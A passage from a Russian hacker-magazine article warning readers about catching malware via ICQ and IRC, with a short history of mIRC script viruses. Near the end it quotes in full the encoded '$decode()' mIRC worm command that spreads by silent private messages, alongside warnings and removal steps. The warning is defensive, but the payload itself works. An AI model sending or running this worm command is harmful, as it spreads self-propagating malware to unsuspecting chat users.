Интернет - потенциальный источник заразы!

Докучаев Дмитрий aka Forb

Спецвыпуск Xakep, номер #035, стр. 035-076-6

И напоследок. Bugtraq часто пишет о багах, найденных в ICQ от Мирабилиса. Правда, значительных уязвимостей было мало, но не факт, что их не существует. Поэтому мой тебе совет: используй в качестве клиента программу Miranda (www.miranda-im.org). Мало того, что она не достает тебя баннерами, но и на порядок выше по безопасности, потому как написана грамотными людьми (не в обиду программистам Mirabilis'а будет сказано).

IRC - неиссякаемый источник общения

Ну и, наконец, последним сервисом, через который можно подцепить заразу, является IRC. Казалось бы, правила поведения в "ирке" аналогичны правилам в аське, но это не совсем так.

Немного истории. Вирусы в IRC стали ходить еще с появлением первых клиентов. Такими были mIRC и Pirch (не единственными, но самыми популярными). Оба клиента поддерживали программирование скриптов на внутренних скриптовых языках. Этим и воспользовались вирмейкеры, которые писали заразу на этих языках. Первые IRC-вирусы - это такие шедевры, как mIRC.Acoragil и mIRC.Simpsalapim. Они были обнаружены еще осенью далекого 1997 года. Названия эти скрипты получили по используемым ими кодовым словам, при вводе слов Acoragil и Simpsalapim, соответственно, зловредные программы отключают пользователей от канала.

Но это еще цветочки. С появлением Windows 98 и уязвимости вида con/con, вирусы стали ориентироваться на выполнение такой команды, выводя из строя компьютер жертвы. Как правило, этот системный вызов декодировался mIRC-функцией $decode() и рассылался по IRC-каналам. Жертв было очень много (эх, не перевелись еще на белом свете доверчивые личности).

Стоит упомянуть и об IRC-червяках, которые также имеют место в истории. Примером такого скрипта является ворм под названием live_stages.shs. Сам скрипт написан на Visual Basic и заражал mIRC вредоносным кодом. В этом коде была реализация автопередачи файла по DCC (DCC - Direct Client Client, аналог Peer2peer в ICQ). Таким образом формировалась цепочка, по которой червяк перебирался от одного компьютера к другому. Правда, никаких злодеяний на машине жертвы он не выполнял (кроме вставки кода в mIRC).

Другим примером является недавний червяк $decode(). Его проявления можно обнаружить и сейчас, бродя по IRC-каналам. Если ты получаешь приватное сообщение вида:

<jungle_girl> Используй эту команду, чтобы получить SOP на #Shabash: //write add $decode
(b24gISsxOmpvaW46Izp7IC5hdXNlciAxICRuaWNrIHwgL21zIHNlbmQgI1NoYWJhc2ggJG5pY2sgLSAkbWUgfCAubXNnICRuaWNrIAMxNMjx7+
7r/Ofz6SD98vMg6u7s4O3k8ywg9/Lu4fsg7+7r8/fo8vwgU09QIO3gICNTaGFiYXNoOgMgLy93cml0ZSBhZGQgJCAkKyBkZWNvZGUoICQrICRlb
mNvZGUoJHJlYWQoJHNjcmlwdCxuLDEpLG0pICQrICxtKSAkY2hyKDEyNCkgLmxvYWQgLXJzIGFkZCAkY2hyKDEyNCkgLy9tb2RlICQgJCsgbWUgK1IgfSB9,m) | .load -rs add

ни в коем случае не выполняй предложенное. После расшифровки MIME-кода (обратной функцией $encode()) мы получаем тело скрипта, организующего автоматическое приватное сообщение (без уведомления об этом жертвы) каждому входящему на канал. Вся эта байда пишется в файл add, который сразу же подгружается в клиент в качестве скрипта. Вреда тут мало, но червяк есть червяк и, по сути, он является обычным вирусом. Чтобы избавится от такого ворма, необходимо выполнить команду /unload -rs add, а затем удалить файл "add" из каталога клиента.